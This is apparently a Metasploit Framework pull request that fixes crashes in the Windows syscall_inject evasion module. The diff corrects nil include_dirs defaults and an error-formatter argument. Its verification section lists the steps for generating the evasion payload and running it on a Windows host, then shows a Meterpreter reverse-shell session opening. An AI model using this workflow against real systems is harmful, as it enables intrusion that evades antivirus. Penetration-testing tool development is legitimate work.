### PR TITLE
Fix evasion windows syscall inject module crash

### DIFF
--- a/lib/metasploit/framework/compiler/mingw.rb
+++ b/lib/metasploit/framework/compiler/mingw.rb
@@ -89,7 +89,7 @@ module Metasploit
             @link_script = opts[:linker_script]
             @compile_options = opts[:compile_options]
             @opt_lvl = opts[:opt_lvl]
-            @include_dirs = opts[:include_dirs]
+            @include_dirs = opts[:include_dirs] || []
             @mingw_bin = MINGW_X86
           end
 
@@ -112,7 +112,7 @@ module Metasploit
             @link_script = opts[:linker_script]
             @compile_options = opts[:compile_options]
             @opt_lvl = opts[:opt_lvl]
-            @include_dirs = opts[:include_dirs]
+            @include_dirs = opts[:include_dirs] || []
             @mingw_bin = MINGW_X64
           end
 

--- a/lib/msf/base/simple/evasion.rb
+++ b/lib/msf/base/simple/evasion.rb
@@ -93,7 +93,7 @@ module Evasion
       raise $!
     rescue ::Msf::OptionValidateError => e
       evasion.error = e
-      ::Msf::Ui::Formatter::OptionValidateError.print_error(mod, e)
+      ::Msf::Ui::Formatter::OptionValidateError.print_error(evasion, e)
     rescue ::Exception => e
       evasion.error = e
       evasion.print_error("evasion failed: #{e}")


### PR DESCRIPTION
Closes https://github.com/rapid7/metasploit-framework/issues/18212

## Verification

- Ensure you have `x86_64-w64-mingw32-gcc` on your path
- `use evasion/windows/syscall_inject`
- `set lhost x.x.x.x`
- `run`
- `to_handler`
- `Run and execute on the windows host
- Wait 30 seconds to verify a new shell opens

```
msf6 evasion(windows/syscall_inject) > 
[*] Sending stage (200774 bytes) to 192.168.123.133
[*] Meterpreter session 1 opened (192.168.123.132:4444 -> 192.168.123.133:49883) at 2023-07-24 11:13:51 -0400

msf6 evasion(windows/syscall_inject) > sessions

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  1         meterpreter x64/windows  WINDEV\vagrant @ WINDEV  192.168.123.132:4444 -> 192.168.123.133:49883 (192.168.123.133)


```